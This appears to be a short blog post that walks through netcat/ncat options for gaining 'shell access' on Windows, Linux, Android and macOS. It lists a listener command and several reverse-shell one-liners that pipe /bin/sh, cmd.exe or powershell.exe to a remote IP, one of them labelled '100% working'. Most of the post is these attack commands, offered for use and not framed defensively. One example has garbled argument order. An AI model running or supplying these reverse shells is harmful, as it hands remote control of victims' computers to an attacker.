ncat - Windows , linux , android & macos shell access

    nc [options] [host] [port] 

    Common Netcat Options:

    • -l: Listen mode - Creates a listening server on a specified port
    • -u: UDP mode - Uses UDP protocol instead of TCP (default)
    • -v: Verbose mode - Provides more output during operation
    • -p <port>: Specify the source port (useful for avoiding conflicts)
    • -t: No delay - Disables Nagle's algorithm for faster data transfer (may not be compatible with all applications)
    • -e <program>: Executes a program after a successful connection (advanced usage)

     

    $nc -lvp 1234 - linux - port listening

    $ncat ip  1234  -e /bin/sh - android/linux

    $ncat ip  1234  -e cmd.exe/powershell.exe - windows

    $ncat -e 192.168.75.128 1111 cmd.exe - 100% working

    $nc -vv ip port

    Software neccessary for using ncat 

    Windows

    Download Nmap and Ncap

    from nmap website.

    Linux 

    Download ncat

    sudo apt install ncat


    #shellaccess #shellaccessinwindows #shellaccessinlinux #shellaccessinandroid

    Comments

    Popular posts from this blog

    Linux Commands part - 2